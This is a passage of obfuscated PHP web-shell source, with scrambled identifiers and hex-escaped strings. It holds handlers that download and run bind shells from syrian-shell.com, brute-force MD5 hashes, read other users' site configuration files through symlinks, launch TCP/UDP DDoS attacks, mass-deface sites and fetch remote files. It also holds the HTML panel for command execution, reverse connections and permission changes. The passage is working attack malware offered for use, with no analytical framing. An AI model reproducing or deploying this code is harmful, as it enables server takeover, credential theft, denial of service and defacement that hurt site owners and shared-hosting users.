DeleteFile('perl2-linux.zip'); iI11i0Il0iO0iooi('perl2-linux.sy3',0755); Exe('perl perl2-linux.sy3 '.$port); } else if ($_POST['use'] == 'bind3-win') { iloOl1lloloI1loI('http://syrian-shell.com/bind/bind3-win.zip'); UnZip('bind3-win.zip',getcwd()); DeleteFile('bind3-win.zip'); iI11i0Il0iO0iooi('bind3-win.sy3',0755); Exe('perl bind3-win.sy3 '.$port); } else if ($_POST['use'] == 'php2') {ilII1oOlIo10I0oi('pb',"", $port, $ip) ;} else if ($_POST['use'] == 'c1') { iloOl1lloloI1loI('http://syrian-shell.com/bind/bind4-linux-c.zip'); UnZip('bind4-linux-c.zip',getcwd()); DeleteFile('bind4-linux-c.zip'); iI11i0Il0iO0iooi('bind4-linux-c.c',0777); Exe('gcc -o bind4-linux-c.c bind4-linux-c'); Exe('./bind4-linux-c -s /bin/sh -c girl -r /home -w '.$i0oI1OlOO0II0o00.' -p '.$port.''); } }  
 
 
elseif($_POST['CrackMd5']) { set_time_limit(0); function i0i11l11O1I0IOIi() { set_time_limit(0); $chars=$_POST['chars']; $chars=str_replace("<",chr(60),$chars); $chars=str_replace(">",chr(62),$chars); $c=strlen($chars); for ($next = 0; $next <= 31; $next++) { for ($iI0llooOoioiI1iI = 0; $iI0llooOoioiI1iI <= $c; $iI0llooOoioiI1iI++) { $iOoI1oOi0o0OlI0O[1] = $chars{$iI0llooOoioiI1iI}; for ($iIiIi0o1o00OI0oi = 0; $iIiIi0o1o00OI0oi <= $c; $iIiIi0o1o00OI0oi++) { $iOoI1oOi0o0OlI0O[2] = $chars{$iIiIi0o1o00OI0oi}; if ($next <= 2) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1i0loOlioi1I110 = 0; $i1i0loOlioi1I110 <= $c; $i1i0loOlioi1I110++) { $iOoI1oOi0o0OlI0O[3] = $chars{$i1i0loOlioi1I110}; if ($next <= 3) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ii001o01l1ioIioi = 0; $ii001o01l1ioIioi <= $c; $ii001o01l1ioIioi++) { $iOoI1oOi0o0OlI0O[4] = $chars{$ii001o01l1ioIioi}; if ($next <= 4) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iIOiiOoll1liI0O0 = 0; $iIOiiOoll1liI0O0 <= $c; $iIOiiOoll1liI0O0++) { $iOoI1oOi0o0OlI0O[5] = $chars{$iIOiiOoll1liI0O0}; if ($next <= 5) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iOII1Ol0000OI1o0 = 0; $iOII1Ol0000OI1o0 <= $c; $iOII1Ol0000OI1o0++) { $iOoI1oOi0o0OlI0O[6] = $chars{$iOII1Ol0000OI1o0}; if ($next <= 6) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiIii0lOO0OiIlI0 = 0; $iiIii0lOO0OiIlI0 <= $c; $iiIii0lOO0OiIlI0++) { $iOoI1oOi0o0OlI0O[7] = $chars{$iiIii0lOO0OiIlI0}; if ($next <= 7) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioIO1OiO0OlOIi1O = 0; $ioIO1OiO0OlOIi1O <= $c; $ioIO1OiO0OlOIi1O++) { $iOoI1oOi0o0OlI0O[8] = $chars{$ioIO1OiO0OlOIi1O}; if ($next <= 8) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($il10i0iOo0iiIil0 = 0; $il10i0iOo0iiIil0 <= $c; $il10i0iOo0iiIil0++) { $iOoI1oOi0o0OlI0O[9] = $chars{$il10i0iOo0iiIil0}; if ($next <= 9) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioliiOOOO11oIOoi = 0; $ioliiOOOO11oIOoi <= $c; $ioliiOOOO11oIOoi++) { $iOoI1oOi0o0OlI0O[10] = $chars{$ioliiOOOO11oIOoi}; if ($next <= 10) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioOOlOOooiilI1Oo = 0; $ioOOlOOooiilI1Oo <= $c; $ioOOlOOooiilI1Oo++) { $iOoI1oOi0o0OlI0O[11] = $chars{$ioOOlOOooiilI1Oo}; if ($next <= 11) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iliIlo0oio0oIOlI = 0; $iliIlo0oio0oIOlI <= $c; $iliIlo0oio0oIOlI++) { $iOoI1oOi0o0OlI0O[12] = $chars{$iliIlo0oio0oIOlI}; if ($next <= 12) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ilIii0O0iooiI1o0 = 0; $ilIii0O0iooiI1o0 <= $c; $ilIii0O0iooiI1o0++) { $iOoI1oOi0o0OlI0O[13] = $chars{$ilIii0O0iooiI1o0}; if ($next <= 13) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiioiOOo10i0Iol1 = 0; $iiioiOOo10i0Iol1 <= $c; $iiioiOOo10i0Iol1++) { $iOoI1oOi0o0OlI0O[14] = $chars{$iiioiOOo10i0Iol1}; if ($next <= 14) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iilIio0Oi011IilO = 0; $iilIio0Oi011IilO <= $c; $iilIio0Oi011IilO++) { $iOoI1oOi0o0OlI0O[15] = $chars{$iilIio0Oi011IilO}; if ($next <= 15) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($il1Iloo01loOIiol = 0; $il1Iloo01loOIiol <= $c; $il1Iloo01loOIiol++) { $iOoI1oOi0o0OlI0O[16] = $chars{$il1Iloo01loOIiol}; if ($next <= 16) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1loio0OlloiIlOl = 0; $i1loio0OlloiIlOl <= $c; $i1loio0OlloiIlOl++) { $iOoI1oOi0o0OlI0O[17] = $chars{$i1loio0OlloiIlOl}; if ($next <= 17) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiOi1O00i11oIlOO = 0; $iiOi1O00i11oIlOO <= $c; $iiOi1O00i11oIlOO++) { $iOoI1oOi0o0OlI0O[18] = $chars{$iiOi1O00i11oIlOO}; if ($next <= 18) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i0oil0o0l111IloO = 0; $i0oil0o0l111IloO <= $c; $i0oil0o0l111IloO++) { $iOoI1oOi0o0OlI0O[19] = $chars{$i0oil0o0l111IloO};
if ($next <= 19) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ilil1001o0o1IO0I = 0; $ilil1001o0o1IO0I <= $c; $ilil1001o0o1IO0I++) { $iOoI1oOi0o0OlI0O[20] = $chars{$ilil1001o0o1IO0I}; if ($next <= 20) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiO11O010oioIIo1 = 0; $iiO11O010oioIIo1 <= $c; $iiO11O010oioIIo1++) { $iOoI1oOi0o0OlI0O[21] = $chars{$iiO11O010oioIIo1}; if ($next <= 21) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iooilo0100llIO1l = 0; $iooilo0100llIO1l <= $c; $iooilo0100llIO1l++) { $iOoI1oOi0o0OlI0O[22] = $chars{$iooilo0100llIO1l}; if ($next <= 22) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1l01Oo1o1o0II10 = 0; $i1l01Oo1o1o0II10 <= $c; $i1l01Oo1o1o0II10++) { $iOoI1oOi0o0OlI0O[23] = $chars{$i1l01Oo1o1o0II10}; if ($next <= 23) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i00lloOioiOlIIOI = 0; $i00lloOioiOlIIOI <= $c; $i00lloOioiOlIIOI++) { $iOoI1oOi0o0OlI0O[24] = $chars{$i00lloOioiOlIIOI}; if ($next <= 24) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i10lioO1oii0IoIl = 0; $i10lioO1oii0IoIl <= $c; $i10lioO1oii0IoIl++) { $iOoI1oOi0o0OlI0O[25] = $chars{$i10lioO1oii0IoIl}; if ($next <= 25) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiiO1oOiO111IiOl = 0; $iiiO1oOiO111IiOl <= $c; $iiiO1oOiO111IiOl++) { $iOoI1oOi0o0OlI0O[26] = $chars{$iiiO1oOiO111IiOl}; if ($next <= 26) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1ioi0Olloo0I0o1 = 0; $i1ioi0Olloo0I0o1 <= $c; $i1ioi0Olloo0I0o1++) { $iOoI1oOi0o0OlI0O[27] = $chars{$i1ioi0Olloo0I0o1}; if ($next <= 27) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i00o1O0il0OlIo11 = 0; $i00o1O0il0OlIo11 <= $c; $i00o1O0il0OlIo11++) { $iOoI1oOi0o0OlI0O[28] = $chars{$i00o1O0il0OlIo11}; if ($next <= 28) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i10110011oloIllO = 0; $i10110011oloIllO <= $c; $i10110011oloIllO++) { $iOoI1oOi0o0OlI0O[29] = $chars{$i10110011oloIllO}; if ($next <= 29) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i01ll0Oil1OoIlIo = 0; $i01ll0Oil1OoIlIo <= $c; $i01ll0Oil1OoIlIo++) { $iOoI1oOi0o0OlI0O[30] = $chars{$i01ll0Oil1OoIlIo}; if ($next <= 30) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1o01o0lliOiII0i = 0; $i1o01o0lliOiII0i <= $c; $i1o01o0lliOiII0i++) { $iOoI1oOi0o0OlI0O[31] = $chars{$i1o01o0lliOiII0i}; if ($next <= 31) { result(implode($iOoI1oOi0o0OlI0O)); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} function result($iOoI1oOi0o0OlI0O) { global $dat, $date; $hash = $_POST['pass']; $iIiOiooolo0IlO1i = date("\110:i:s"); $illo1ooO1o1I0OOi = date("d:\x6d:\x59"); if(md5($iOoI1oOi0o0OlI0O)==$hash) { echo "[+] \103\162a\x63\x6b\145\144 !! 
P\141ss\x77\x6fr\144 i\x73: $iOoI1oOi0o0OlI0O"; exit; } } if(!$_POST['pass']){echo "\x59o\165 Fo\x72\147\157\164 S\157m\x65\x74\x68i\156\147 \x49m\160o\x72\x74\141n\164 !! .. Li\x6be \110a\x73\150 : ) .";} else { $pass=htmlspecialchars($pass); $pass=stripslashes($pass); $dat=date("H:i:s"); $date=date("d:m:Y"); i0i11l11O1I0IOIi(); } }  
 
 
elseif($_POST['AutoHackNow']) { chdir($_POST['autoHackDir']); if(file_exists('AutoHackConfig.txt')) { DeleteFile('AutoHackConfig.txt'); } $domainToHack = $_POST['domainToHack']; $domainToHack = str_replace("ht\x74\160://","",$domainToHack); $domainToHack = str_replace("\x77\x77\167","",$domainToHack); $ScriptType = $_POST['ScriptType']; $index = $_POST['index']; $scriptPath = $_POST['scriptPath']; $iioIiOli00iI0Ilo = iIll1ll1iOoIoloo($domainToHack); $iooillOl10IIiloI = iilI11l1o01IilIo($ScriptType); if(function_exists('symlink')) {symlink("/\x68o\x6d\x65/$iioIiOli00iI0Ilo/\160\x75bli\143_html$scriptPath$iooillOl10IIiloI",'AutoHackConfig.txt');} else{Exe("\154n -s /\150\x6f\x6d\145/$iioIiOli00iI0Ilo/\160u\142\x6c\x69\x63_h\x74m\x6c$scriptPath$iooillOl10IIiloI A\x75t\x6f\x48a\x63k\x43\157\156\x66\x69g.\x74\170\164"); } $file = file_get_contents('AutoHackConfig.txt' ,null , null , true); iii0li0iIOii1III('FileToInclude.txt',$file); iI11i0Il0iO0iooi('FileToInclude.txt',0644); include_once('FileToInclude.txt'); i01IiIiilloIOIOO(); }  
 
 
elseif($_POST['StartAttack']) { $url = $_POST['ipToAttack']; set_time_limit(0); echo "[+] \x73t\x61\x72\164\x69\156g o\x6e $url\n"; if($_POST['DDOSType'] == 'tcp'){i1lOlOi0I01ooOoo($url);} else if($_POST['DDOSType'] == 'udp'){iOIilO1iIolIl11l($url);} }  
 
 
if($_POST['changeDirectory']) { $directory = $_POST['directory']; $directory = str_replace("\\\\"," ",$directory); $directory = str_replace(" ","\\",$directory); chdir($directory); }  
 
 
elseif ($_POST['massDefaceNow']) { $ioIOlo1li1o0IoOI = io0li01lioliIl1i($_POST['massDir'],$_POST['massFileName'],$_POST['massIndex']); if($ioIOlo1li1o0IoOI == 'notfound'){echo 'Directory Not Found !!';} else if ($ioIOlo1li1o0IoOI == 'notperm'){echo 'Permission Denied !!';} }  
 
 
else if($_POST['doAction'] && ($_POST['someAction'] == 'DOSServer1')) {cx();} else if($_POST['doAction'] && ($_POST['someAction'] == 'DOSServer2')) {ilOi1ollol1Il0Oi();}  
 
 
if($_POST['getFile']) { $fileUrl = $_POST['fileUrl']; $getType = $_POST['getType']; if($getType == 'auto'){iloOl1lloloI1loI($fileUrl);} else{Exe("'".$getType." ".$fileUrl."'");} }  
echo "</t\145\170t\141\x72\x65\141>"; if($_POST['editFileSubmit'] && ($_POST['actionType'] == 'edit')) { echo "
<input type='h\x69\x64\144e\x6e' name='currentPath' value=".getcwd()." />
<input type='h\x69\144\144\x65\156' value='".$_POST['editFile']."' name='\146i\154\145\062e\144\151\164' /> 
<input type='submit' value='\x53a\x76\x65' name='\x73\x61v\x65\105\x64ited\106\x69\154\x65' size='50'>
"; } echo "</\x66o\x72\x6d>
<!-- \x4d\x61i\x6e Tabl\x65 -->
<tab\x6c\145 w\151\144\164\x68='100%'><t\x72>
<\164\144 \x77\151\144\x74\150='30%' \x68\x65\x69\147\x68t='30'>
<!-- E\x6ed O\146 \115a\151\156 \x54\x61\142\154e -->
<!-- \103om\x6dan\144\163 \x41\x6ci\x61s-->
<\x66or\x6d method='\120\x4f\x53T'><\x74\141\x62\x6ce \x77\151d\x74\x68='100%' \x68\x65i\x67\x68t='72' b\x6fr\x64\145r='0' \x69\144='\x42\x6fx'><t\162>
<\x74d \x77i\144\164\x68='4%' \150\x65i\x67\150t='21' \163\164y\154e='\142\141c\x6bg\x72\x6f\x75\x6ed-col\x6f\x72:".$iIi1i11l11OoIlIl."'>&\156bs\x70;</\164\x64>
<\164\x64 \163\x74y\154e='\142ack\x67r\157un\x64-co\154\x6fr:#666;\x70\x61dd\151\156\x67-\x6c\145ft:10\160x;'>Comm\141nds Ali\141s </\x74\x64></\x74\162><\x74\162><\164d \x68\x65\151\147\150\x74='45' \143\157l\163\160a\x6e='2'>";i0IilOl1iIl0llOi($os); echo "<input name='\x73\x75\x62\x6d\x69\164Co\x6d\x6d\141\156\144\x73' type='submit' value='\x45\x78e\143ute\x43\x6f\x6d\155\141\156d'></\x74\144></t\x72></t\x61\x62l\145></f\x6fr\155>
<!-- \105\156d \x4f\146 \103\157m\x6d\x61\x6e\x64s \101l\151\x61\163-->
</td>
<\164\x64 \167\151\144\x74\x68='30%' \150e\151g\150t='30'>
<!-- \103\157m\x6da\x6e\x64 \x4c\x69\156\x65 -->
<\146\157r\x6d method='\120\x4f\123T'>
<t\x61b\154\145 w\x69\x64t\150='100%' \150eig\x68t='72' \x62orde\162='0'  \x69d='\x42\157x'><\164\x72>
<\x74\x64 wid\x74h='4%' \150\145igh\x74='21' \163\x74\171\154\145='\x62a\x63\153g\162o\x75nd-col\x6f\162:".$iIi1i11l11OoIlIl."'>&\156b\x73p;</\x74\144>
<\x74\x64 s\164y\154\x65='b\x61\143k\x67\162o\165nd-co\154or:#666;p\141\144d\151n\147-\x6c\145\146t:10\160\x78;'>\x43\157\x6d\155a\156\x64 \114\x69\156\145 </\x74d></\164\162><\x74\x72><\164d \x68\145\151\147ht='45' \143o\154\163p\141\156='2'>
<input type='text' name='cmd' \x69\144='\x63\x6f\x6d\x6d\x61\156\144L\151\x6e\x65' value='"; if($os == 'Windows') echo "d\x69\162"; else echo 'ls -lia'; echo "' size='59'>
<input type='text' name='directory' value='".getcwd()."' size='59'>
<input name='\x45x\145cu\x74\145' i\x64='\x45\170\145c\x75\164\145' type='submit' value='\x45xe\x63ut\x65' >
<input name='\x68e\154p\103\157m\x6da\x6e\x64\x73' i\x64='\150\x65\154\x70C\157\155m\x61n\144s' type='submit' value='?' >
</\x74\x64></\x74\162></t\x61ble></fo\162m>
<!-- \105\x6ed \x4f\146 \103omm\141nd Li\156\145 -->
</\x74d>
<\164\144 w\151d\164\x68='30%' h\145\151\147h\164=30>
<!-- \106\x69l\145\x73 & \106older\163 \110\x61n\x64\x6cing -->
<\x66o\x72\x6d method='P\x4f\x53\124'>
<t\141\142l\145 \x77\x69\x64\x74h='100%' \x68\145\151\x67\x68t='72' b\157r\x64\x65\162='0'  \151\x64='B\157x'><t\x72>
<t\x64 \x77\x69\x64\x74\150='4%' \150\x65\x69\147\150\x74='21' \163\x74\x79\x6c\145='\x62\x61\x63k\x67\x72\x6f\x75\156\x64-co\x6co\162:".$iIi1i11l11OoIlIl."'>&\x6e\142\x73p;</\164d>
<t\x64 \163\164\171\154\x65='ba\x63\x6b\147\162\157\x75\156\x64-\x63o\154or:#666;\160\141dd\x69\156g-\x6ceft:10px;'>\106i\154\x65\x73 & F\157\x6c\x64\145rs H\141\156d\154\151\156g </\164\144></t\162><\164\162><t\144 heigh\x74='45' \x63\157\x6c\x73\x70\141n='2'>
<input type='text' name='\x65\144\151\164\106\x69l\145' i\x64='e\x64\x69tFi\154e' size='25' value='index.\164\x78\164'>
<s\x65l\x65\143\164 name='ac\164i\x6fn\124ype' \x69\x64='\141\143\164i\x6f\x6e\x54\171p\145' o\156\143\x68\x61\156\147\x65='C\150\141\x6e\x67\145\x49\x6e\160\165ts();'>
<option value='\x65\x64i\164'>\x45\144it</option>
<option value='\x72en\x61m\145'>\x52\x65n\141\155\145</option>
<option value='co\160\x79'>C\x6f\x70y</option>
<option value='deleteFolder'>De\x6c\x65\164e \106old\x65\x72</option>
<option value='\144\145l\x65t\145Fi\154e'>\104\x65\x6c\x65\x74\145 F\151\x6ce</option>
<option value='\143\x72\x65at\145Fi\154\145'>\103\162ea\x74e F\x69l\x65</option>
<option value='cr\x65at\145\x46\157l\144er'>\103re\141\164e \x46\157l\x64\x65\162</option>
<option value='zip'>\132\x69p</option>
<option value='un\x7aip'>UnZip</option>
<option value='\x74\141r'>\x54a\x72</option>
<option value='un\x74ar'>\125\x6eTa\162</option>
<option value='g\172'>\x47\x5a</option>
<option value='u\156\x67\172'>u\156\x47\x5a</option>

</\163\145\154\145ct>
<input type='hid\144\145\156' name='currentPath' value='".getcwd()."' />
<input name='e\144\151t\106\x69\x6c\x65Su\142mit' type='submit' value='\104\x6f'>
<\144i\166 i\x64='newN\141\x6de'>&n\142s\160;</di\x76>
</t\144></\164\x72></ta\142\x6ce></\x66o\162m>
<!-- \106\151les & \106\157l\x64\x65r\163 \110\141\156\144\x6c\x69\x6e\147 -->
</t\x64>
</\164\162>
<\164r>
<\164\144 \167i\x64t\x68='30%'>
<!-- \x43hm\157\144 \x46\x6fr\x63e -->
<\x66o\x72\155 method='\x50O\x53\124'><\164ab\154\x65 \x77\151d\x74h='100%' \150\145\151g\150\x74='72' b\157\x72de\x72='0'  \x69\x64='\102\157\x78'><\x74\162>
<\x74\x64 \x77\x69\144\x74\150='4%' \150\145\x69\147h\x74='21' s\164\x79l\x65='ba\x63\x6b\x67\x72\157\x75\x6e\x64-\x63\x6f\x6cor:".$iIi1i11l11OoIlIl."'>&\156\x62\x73\160;</\x74\144>
<\164d \163\x74\171le='b\x61ckgro\x75nd-\143\x6f\154\x6f\x72:#666;p\x61\144d\x69n\147-\x6c\x65f\x74:10p\170;'>\x43\x68\141\156\x67e \115\x6f\x64e </\x74\x64></\x74\162><\x74\162><\x74\x64 h\145\x69\147\150t='45' c\157\154s\160an='2'>
<input type='text' name='\x66\x69\154\x65Na\x6d\145' value='index.\160\x68\160' size='48'>
<input type='text' name='per' value='0644' size='10'>
<input type='submit' value='C\150\x61n\x67e \x4e\157\167 !' name='\143\x68\141\156\x67\145\x50\x65\162\155i\163s\151\x6f\156'>
</\164\x64></\x74\x72></ta\x62\154\145></f\157\162\x6d>
<!-- \x45nd O\x66 \103\x68\x6d\x6fd \x46\157\162c\145 -->
</\164\144>
<td>
<!-- \107\145t \x46\151\154\145 -->
<f\x6f\x72m method='\120\117\x53\124'><t\141\142le \x77i\144\164\150='100%' he\151\147h\x74='72' \142o\162de\x72='0'  \x69\x64='\102\157\x78'><\x74\162>
<\x74\144 \x77i\144th='4%' h\x65\151g\x68t='21' \x73t\x79le='\142\x61\x63\x6b\147\162\x6fu\x6ed-\143\x6fl\x6f\162:".$iIi1i11l11OoIlIl."'>&\156\x62\x73\160;</\164d>
<t\x64 \163t\171\154e='\142\x61c\x6b\x67r\x6f\165n\144-\x63\157\154or:#666;\160\x61\x64\144ing-l\x65\146\x74:10\x70\x78;'>\x47\145\x74 \106\151l\x65 </t\x64></t\162><\164\x72><\164d \x68\x65i\x67h\164='45' \x63\x6fl\163\160a\x6e='2'>
<input type='text' name='fileUrl' size='59' value='h\164\x74\x70://\x77ww.'>
<\x73\x65\154\x65\143t name='getType'>
<option value='a\165\x74\x6f'>Au\164\157</option>
<option value='\167\147\145\164'>\x77get</option>
<option value='curl -\157'>curl -\157</option>
<option value='\147\145\x74'>\147et</option>
<option value='\x6cy\156\170 -\163our\x63\145'>\x6cyn\x78 -s\157\165\x72c\x65</option>
</\x73\145\154e\143t>
<input name='\x67e\164\x46\x69le' type='submit' value='\x47\x65t \x46i\x6ce' >
</\164\x64></t\x72></\164\x61bl\x65></f\157rm>
<!-- \x45\156d \x4f\146 \x47\145\x74 \x46\x69\154\x65 -->
</\164\144>
<\x74\144>
<!-- \x42\x69n\x64 \103\x6f\x6e\156\x65\x63\164\x69\x6f\x6e -->
<\146or\155 method='\x50\117\x53T'><t\x61\142\154\145 widt\x68='100%' \150\145\x69gh\x74='72' \x62\x6frder='0' i\144='\102ox'><\x74\162>
<t\x64 \167i\144t\x68='4%' h\x65\151\147\150\x74='21' \x73\x74y\x6c\145='b\141ck\147\162\x6f\x75\156\x64-\x63\x6f\154\x6f\x72:".$iIi1i11l11OoIlIl."'>&\x6e\142\x73p;</\x74\144>
<t\x64 \163\x74y\154e='\142\141c\153\147\162\157u\156d-\x63\x6flor:#666;\x70\x61\144\x64ing-\x6cef\164:10px;'>\102\x69n\144 \x43\157\156n\x65c\x74\151\x6f\x6e </td></\x74r><t\x72><\164\144 \150e\151g\150\164='45' col\x73\x70\x61\156='2'>
<input type='text' name='port' size='10' value='443'>
<\x73e\x6c\145\x63t c\x6cas\163='\151\x6eputz' size='1' name='\165s\145' \x69\x64='b\151n\x64_\163\x65lect' \157n\x63\x68\141n\x67e='v\x69e\167\x50as\163();'>
<option value='p\x68\x70\x31'>\120H\x50[1]</option>
<option value='\x70h\160\x32'>P\x48P[2]</option>
<option value='\x70\x65\x72\1541-l\151\156\165x'>\x50e\162\x6c[1] \114\151\156\x75\170 & \x50\141\x73\163</option>
<option value='\160\145r\1542-li\x6e\165x'>\120\x65\x72\154[2] \114i\156\165\170</option>
<option value='per\x6c\x33-\x77\x69\156'>\x50\145\162\x6c[3] W\x49N</option>
<option value='c\x31-\154\151\156u\x78'>C[1] \114i\x6e\165\170</option>
</\x73\145le\143\x74> 
<input \x63\x6c\141\163\163='\151\x6ep\x75\x74z\x62\165t' type='submit' name='\x62\x69\156\144' value='\x42\151\x6e\144' />
<\x64\151v \x69\x64='v\x69\x65w_b\151\x6ed_p\x61\x73s'>&n\142sp;</\144\151v>
</\x74\144></\x74\x72></\x74\141b\x6c\145></\146orm>
<!-- \x45n\144 \117f Bi\x6e\144 Co\x6e\156\x65\x63\x74\151o\156 -->    
</\x74\144>
</\x74r>
<\x74r>
<\x74\x64>
<!-- \103G\111 S\x63\x72ip\x74s -->
<\x66\x6f\x72\x6d method='\x50\x4f\123T'><\164\141b\x6ce \x77\151\144t\150='100%' \x68\145\x69\147\x68\x74='72' \x62\x6f\162der='0'  i\144='B\x6fx'><\164r>
<\164d \x77i\144\x74h='4%' \150\x65\x69ght='21' \x73\x74y\x6c\145='\142\141\143k\x67\x72\157\165\156\x64-\x63ol\x6f\162:".$iIi1i11l11OoIlIl."'>&\156\x62\x73p;</t\x64>
<\x74\144 s\x74y\x6c\145='\x62\141\143\153g\162o\x75\x6e\x64-c\157\154\157\162:#666;\x70\x61\144\144\151ng-\154\x65\146t:10\160x;'>C\x47\111 S\x63\162\x69pt\163 </t\x64></\x74\x72><\164\x72><t\144 h\x65\151g\150\x74='45' \x63\x6f\154\163\160\x61n='2'>
<input type='text' value='".getcwd()."' name='c\x67i\160erl\x50\141t\x68' size='35'>
<se\154e\143\x74 name='c\x67\151\124\x79\x70e' >
<option value='\143gi\120e\x72\154' >\103\x47I \120er\154</option>
<option value='cg\x69\120\141\x79\164h\157n' >\103G\x49 P\141\x79\164ho\x6e</option>
<option value='\143\147i\x55\x73\x65\x72s' >\x43\107\111 Users</option>
</se\x6c\145\143\x74>
<input type='submit' name='ge\156\x65\x72\141\x74\x65\x50\x65\154' value='\x47en\x65rat\145'></\x74\144></\x74r></t\x61\142\x6c\x65></\x66\157\x72m>
<!-- \105\x6ed \117f C\107I S\x63\x72\x69\160\164\163 -->
</\x74\x64><\164\144>
<!-- \106o\162\x62\151d\x64\145n -->
<\146\x6f\162\155 method='\120\117\123T'><\x74\x61\x62\x6c\x65 \167i\x64\164\x68='100%' \150\x65\x69\x67\150t='72' \x62\x6f\162\144\x65\x72='0'  \151\x64='B\x6f\x78'><\x74\162>
<\164\144 \x77\x69\x64\x74\x68='4%' \150e\151\147ht='21' \163\x74yl\x65='b\141\x63\153gr\157\x75nd-\x63o\x6c\157r:".$iIi1i11l11OoIlIl."'>&\x6eb\x73\x70;</td>
<t\144 \163\164\x79\154e='\x62ac\x6b\x67r\x6fu\156\x64-\x63\157\x6cor:#666;\160\x61\144\144i\156\147-\154\145f\x74:10\x70x;'>\106o\x72\x62i\x64\144\x65\156 </\164d></\x74\x72><\x74\x72><\x74d \150\145\151g\x68t='45' c\x6f\154s\x70a\x6e='2'>
<input type='text' value='".getcwd()."' name='\146\157\x72\142i\144de\156\x50ath' size='70%'/>
<s\145\154e\x63\164 name='403'>
<option value='\104ir\145\143\164\x6fry\x49n\x64\x65\170'>D\x69\162e\x63\x74\x6f\x72\171\x49n\144\145x</option>
<option value='H\x65\141\144\x65\162\116\141m\145'>H\145\141d\145\x72\116a\x6d\x65</option>
<option value='\x54\130\124'>TX\x54</option>
<option value='404'>404</option>
<option value='\122ea\x64\x6de\x4eam\145'>\x52\145\141\144\155\x65N\141\155e</option>
<option value='\x66\157\157\x74er\x4eam\145'>foote\x72\116\141me</option> 
</sel\x65\x63\x74>
<input type='submit' value='\107\x65\x6e\145\x72\141t\145' name='g\145\156\x65\162\141t\145F\157\x72bidde\x6e'>
</\x74d></\x74r></\164\x61\x62\154\x65></\x66o\x72m>
<!-- \105\156\144 \117\146 \x46\157rb\x69dd\145\x6e -->
</\x74\x64>
<\164\144>
<!-- \102\141\x63k Co\x6ene\143\164\151on -->
<\146o\162\x6d method='P\x4fST'><t\141\142\154\x65 \167\x69d\x74\150='100%' \150\145\x69\x67ht='72' \x62\157\x72der='0'  \x69\x64='\102\x6f\170'><\x74\162>
<t\x64 \167\x69\x64t\x68='4%' \150ei\147ht='21' styl\x65='\142\x61ckg\162o\x75\156\144-c\157\x6c\x6f\162:".$iIi1i11l11OoIlIl."'>&\156\x62\x73\160;</\x74d>
<\x74\144 \163ty\x6c\145='\142\141ckgro\x75\156\x64-co\154\x6f\x72:#666;\160\141\x64\x64\151\x6e\x67-\154\145\146t:10p\x78;'>\102\141\x63\x6b Co\x6e\156e\143\164\151o\x6e </\164\x64></tr><\x74\162><t\144 he\151\147h\x74='45' c\x6f\154\x73p\x61\156='2'>
<input type='text' name='ip' size='26' value='".ill0iiioI0III0I0()."'>
<input type='text' name='\142\141c\153\x70or\x74' size='10' value='443'>
<\x73el\145c\x74 name='\165se' \x69\144='b\x61c\153_se\154\145\143\x74' \157\x6ec\x68a\x6e\147\145='\166\x69\145\x77\x50a\x73s();'>
<option value='\160\150p\061'>\x50\110\120[1]</option>
<option value='\160h\160\062'>\x50HP[2]</option>
<option value='\x70h\160\063-\167\151\x6e'>\x50\x48P[3] \127I\x4e</option>
<option value='\x70\x68\x70\063-l\x69n\165\170'>\120\x48P[3] \x4c\x69\x6eux</option>
<option value='php\064'>\x50\110\x50[4]</option>
<option value='\160\145\162l\x31'>P\x65rl[1]</option>
<option value='\x70\145\162l\062'>\120\145\162l[2] \120\x61\x73\x73</option>
<option value='\160\x65r\154\063-\167\151n'>\x50\145r\x6c[3] \x57\x49\116</option>
<option value='\160\145\162l\x34-l\151n\165\x78'>\120e\162\x6c[4] \114\x69\156\165\170</option>
<option value='\143\x31'>C[1]</option>
</\x73\x65\154\145\x63t> 
<d\151\x76 i\144='vi\x65\167_pa\x73\163'>&\156b\x73\160;</\x64\x69\x76>
<input type='submit' name='\142\141c\153con\x6e' value='\103\157nn\x65c\x74'>
</t\144></\164\x72></\164\x61\x62\154\x65></\146o\162m>
<!-- \105\x6ed \117\146 \102\141\143\153 C\157\156n\x65\x63\164i\x6fn -->
</\164\x64>
</\164r>
<\164\x72>
<\x74\x64>
<!-- \x52\x65\141\x64\x69\156g \106\151\x6ces -->
<f\157r\x6d method='\120OS\x54'><\x74\x61\142l\x65 w\151\x64\x74\150='100%' \x68e\x69\147\150\x74='72' b\157r\144\x65\162='0'  i\x64='\102\x6f\170'><\x74\x72>
<\x74\x64 wi\144\164h='4%' \150e\151gh\x74='21' s\164\171\x6ce='ba\143\x6b\147r\x6f\x75\156\144-\x63\x6fl\157\x72:".$iIi1i11l11OoIlIl."'>&\156\142\163\160;</\164d>
